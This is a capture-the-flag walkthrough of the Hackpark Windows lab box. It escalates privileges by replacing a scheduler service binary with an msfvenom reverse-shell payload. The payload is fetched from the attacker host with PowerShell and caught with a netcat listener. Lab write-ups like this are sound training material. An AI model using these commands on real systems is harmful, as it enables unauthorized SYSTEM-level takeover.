- Link: hackpark
- Difficulty: Medium
rootflags on a windows machine
- Highlight: hijacking a system process to spawn a reverse shell
- Tags: RCE (remote code execution), Windows, Winpeas
In this walkthrough, we will continue to build on our work in Hackpark I, but this time we will solve the box again without Metasploit.
The general approach will be to use
winpeas to automate local enumeration of the server. We’ll review the results of
winpeas and continue our privilege escalation by spoofing a system process and throwing an NT System Authority reverse shell (aka Windows root shell!).
Watching the first few minutes of the video might be a good review of Hackpark part I, because I quickly go through the final steps of the foothold stage below, starting with payload creation using
msfvenom, and then I slow down again for the privilege escalation stage without using Metasploit.
We’ll be picking up on the box from the alternative
privesc attack vector shown below (Method 2)
SPIN UP AN FTP SERVER TO TRANSFER WINPEAS TO TARGET
Issue the following command to spin up a simple server from the directory that holds the
python3 -m http.server
LOCAL RECON WITH WINPEAS
TEST OUT THE AUTO-LOADING USER:PASS COMBO WITH REMOTE DESKTOP
Let’s follow up on Winpeas’ first interesting finding. We attempt to log in to the server using the remote desktop protocol (RDP) autologin credentials.
Unfortunately, this turns out to be a dead end. We’ll move on to other interesting findings
REVIEW INTERESTING FINDINGS
The other interesting finding from WinPEAS that jumps out at me is:
========================= WindowsScheduler(Splinterware Software Solutions - System Scheduler Service)[C:\PROGRA~2\SYSTEM~1\WService.exe] - Auto - Running File Permissions: Everyone [WriteData/CreateFiles] Possible DLL Hijacking in binary folder: C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles]) System Scheduler Service Wrapper ========================================================================
It appears that there may be a DLL (dynamic link library) hijacking exploit opportunity with the windows system scheduler service.
The file is listed as being located in the folder:
C:\Program Files (x86)\SystemScheduler. Let’s navigate there in our terminal to see what files might be running a service. On Windows, these files will usually
It looks like the
Message.exe file might be the service we need to spoof.
Going forward, we will replace the file with our own malicious payload to spawn a reverse shell. We are hoping that the user NT SYSTEM AUTHORITY will be the one that runs the
Message.exe file, so that the reverse shell will give us full root privileges.
CREATE A REVSHELL WITH MSFVENOM
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=9999 -f exe -o payload.exe
EXPLOIT THE MACHINE BY SPOOFING A WINDOWS SERVICE
payload.php over to the windows machine’s and rename it as
Message.exe, and place it in the directory
C:\Program Files (x86)\SystemScheduler in two easy steps:
- Check to see if the simple HTTP server is still running on port 8000 of the attack machine in the folder that contains
payload.exe. If the file location is different from the server, move
payload.exeto the current folder that is being served.
- Copy the file over to the target machine as
Message.exeand place it in the correct
SystemSchedulerfolder by issuing the following command on Windows:
powershell -c "Invoke-WebRequest -Uri 'http://10.6.2.23:8000/payload.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\Message.exe'"
FIRE UP A NETCAT LISTENER TO CATCH THE REVSHELL
nc -lnvp 9999 (or whatever port you specified in the
msfvenom reverse shell payload)
And now, waiting a few seconds, we should catch our revshell and confirm that we are Windows NT Authority. We can easily retrieve both flags now using the “
type” command and finish off the box!
This box was one of the more challenging ones I’ve done yet.
It pushed me to chain together the use of several tools that I’ve used in more simple circumstances but never together. With each new hacking challenge completed, I am finding it easier to understand more complex attack vectors.
The details of decrypting hashes, copying files using HTTP servers, and searching for files and privilege escalation pathways on a target system might seem like a lot to grapple with, but with repetition comes familiarity and the logic of each attack starts to become more obvious.
Thanks for reading my walkthrough! Please let me know in the comments of the youtube video what you thought of today’s tutorial.